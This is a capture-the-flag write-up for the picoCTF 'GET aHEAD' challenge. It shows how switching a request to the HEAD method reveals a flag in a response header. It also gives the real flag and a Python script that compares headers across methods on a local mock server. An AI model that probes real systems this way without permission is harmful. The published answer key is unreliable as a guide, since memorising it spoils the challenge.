# GET aHEAD

## Problem

> Find the flag being held on this server to get ahead of the competition <http://mercury.picoctf.net:47967/>

## Solution

1. Use Burp Suite to intercept the request sent when clicking the "Choose Blue" button.
2. Change the POST request to a HEAD request:

   ```
   HEAD /index.php HTTP/1.1
   Host: mercury.picoctf.net:47967
   Content-Length: 0
   Origin: http://mercury.picoctf.net:47967
   Connection: close
   ```
3. The browser shows an empty page because a HEAD response carries no body, but the HTTP history tab under Proxy in Burp Suite shows the flag as an HTTP header in the response:

   ```
   HTTP/1.1 200 OK
   flag: picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
   Content-type: text/html; charset=UTF-8
   ```
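
The same method comparison can be scripted. This is an added example, not part of the original writeup: it starts a constructed local stand-in for the challenge server (the `Handler` class, its page and the placeholder flag value are assumptions, since the real `index.php` is not shown) and reports response headers that appear only for a particular method.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the challenge server: it only mimics the behaviour
# described above (HEAD answers with an extra "flag" header and no body).
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"<html>constructed page</html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=UTF-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    do_POST = do_GET  # the stand-in serves the same page for POST

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("flag", "picoCTF{constructed_placeholder}")
        self.send_header("Content-Type", "text/html; charset=UTF-8")
        self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass

def headers_by_method(host, port, path="/index.php", methods=("GET", "POST", "HEAD")):
    """Send one request per method; return {method: set of lower-cased header names}."""
    seen = {}
    for m in methods:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request(m, path)
        resp = conn.getresponse()
        resp.read()  # empty for HEAD: the response has headers only
        seen[m] = {name.lower() for name, _ in resp.getheaders()}
        conn.close()
    return seen

def method_only_headers(seen, baseline="GET"):
    """Headers present for a method but absent from the baseline method's response."""
    return {m: h - seen[baseline] for m, h in seen.items() if h - seen[baseline]}

def demo():
    srv = HTTPServer(("127.0.0.1", 0), Handler)  # port 0: pick any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return method_only_headers(headers_by_method("127.0.0.1", srv.server_port))
    finally:
        srv.shutdown()
        srv.server_close()
```

Pointing `headers_by_method` at an application you operate shows whether any handler returns extra headers on less common methods.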

### Flag

`picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}`
